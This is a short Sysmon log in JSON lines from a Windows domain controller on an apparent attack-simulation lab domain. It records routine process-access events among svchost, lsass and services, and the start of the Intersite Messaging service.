{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1176,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.823\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.823","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1177,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.823\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.823","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1178,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.823\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.823","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1179,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.823\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.823","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1180,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.823\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.823","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1181,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.823\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.823","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1182,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.823\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.823","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"1108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1183,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.827\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-00106FB80200}\r\nProcessId: 2752\r\nImage: C:\\Windows\\System32\\ismserv.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows NT Intersite Messaging Service\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: ismserv.exe\r\nCommandLine: C:\\Windows\\System32\\ismserv.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=39F0EC2CAE7FF38BABDDE2252ACCEA67,SHA256=29BDF4D2040D24E02B830A272D02CF29F19FD4E1A0F54F22BCC76301A0BFD26F,IMPHASH=088F7CD1DAA87B8E05239EDAB00479BB\r\nParentProcessGuid: {A837DB8D-01B3-5F25-0000-001020530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.827","ProcessGuid":"{A837DB8D-01C5-5F25-0000-00106FB80200}","Image":"C:\\Windows\\System32\\ismserv.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows NT Intersite Messaging Service","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"ismserv.exe","CommandLine":"C:\\Windows\\System32\\ismserv.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=39F0EC2CAE7FF38BABDDE2252ACCEA67,SHA256=29BDF4D2040D24E02B830A272D02CF29F19FD4E1A0F54F22BCC76301A0BFD26F,IMPHASH=088F7CD1DAA87B8E05239EDAB00479BB","ParentProcessGuid":"{A837DB8D-01B3-5F25-0000-001020530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
